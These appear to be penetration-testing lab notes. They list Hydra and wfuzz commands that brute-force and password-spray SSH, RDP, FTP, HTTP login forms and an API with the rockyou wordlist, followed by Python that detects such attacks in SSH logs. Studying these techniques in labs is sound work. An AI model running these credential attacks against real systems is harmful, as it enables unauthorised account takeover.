- sudo gzip -d rockyou.txt.gz
- hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
- We could also attack built-in accounts such as root (on Linux) or Administrator (on Windows).
- hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
- hydra -L newlist.txt -P /usr/share/wordlists/rockyou.txt rdp://192.168.213.202
- hydra -L newlist.txt -p "SuperS3cure1337#" rdp://192.168.213.202
- hydra -l 'nadine' -P /usr/share/wordlists/rockyou.txt rdp://192.168.155.227
- sudo hydra -l itadmin -P /usr/share/wordlists/rockyou.txt -I ftp://192.168.213.202
Note the difference between -l (a single username) and -L (a file of usernames), and between -p (a single password) and -P (a file of passwords), so check for both.
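Seen from the defending side, the two invocation styles above leave different traces in the authentication log: `-l` with `-P` produces many failures for one account, while `-L` with `-p` spreads failures across many accounts. The following Python is an added example, not part of the original notes; the log lines are constructed in OpenSSH's "Failed password" format, and the thresholds and finding labels are assumptions.

```python
import re
from collections import defaultdict

# OpenSSH failure message: "Failed password for [invalid user ]<user> from <ip> port <n> ssh2"
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")


def build_sample():
    """Constructed log lines for the demo (not taken from the page)."""
    lines = []
    # One source hammering a single account: the -l/-P pattern.
    for i in range(12):
        lines.append(f"Jan 10 10:00:{i:02d} host sshd[100]: Failed password for george "
                     f"from 192.0.2.10 port {40000 + i} ssh2")
    # One source trying many accounts once each: the -L/-p pattern.
    for i, user in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"]):
        lines.append(f"Jan 10 10:05:{i:02d} host sshd[101]: Failed password for invalid user "
                     f"{user} from 192.0.2.20 port {41000 + i} ssh2")
    # A legitimate user mistyping once, then logging in: must not be flagged.
    lines.append("Jan 10 10:06:00 host sshd[102]: Failed password for george from 192.0.2.30 port 42000 ssh2")
    lines.append("Jan 10 10:06:05 host sshd[102]: Accepted password for george from 192.0.2.30 port 42000 ssh2")
    return lines


def classify(lines, min_failures=10, min_users=5):
    """Map source IP -> finding. Thresholds are assumed values; tune per environment."""
    per_src = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = FAILED.search(line)
        if m:
            user, src = m.groups()
            per_src[src][user] += 1
    findings = {}
    for src, users in per_src.items():
        if len(users) >= min_users:
            findings[src] = "password-spray"
        elif max(users.values()) >= min_failures:
            findings[src] = "single-account-guessing"
    return findings


if __name__ == "__main__":
    for src, finding in classify(build_sample()).items():
        print(src, finding)
```
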
- Hydra can be used for various services.
- hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid" (HTTP-POST)
→ /index.php is the login page, fm_usr and fm_pwd come from the Burp request, and "Login failed. Invalid" is the line the web page shows on a failed login.
→ The failure string "Login failed. Invalid" must match exactly to give correct results. Try the full message, or part of what we see on a failed login attempt: "Login failed. Invalid username or password".
- hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://192.168.213.201 (HTTP-GET)
- hydra -L new.txt -P /usr/share/wordlists/rockyou.txt http-get://git.offseclab.io/api/v1/user
- wfuzz -z list,Billy-Jack-Lucy-Roger-administrator -z file,/usr/share/wordlists/seclists/Passwords/2020-200_most_used_passwords.txt --basic FUZZ:FUZ2Z http://git.offseclab.io/api/v1/user > output.txt
========================================================================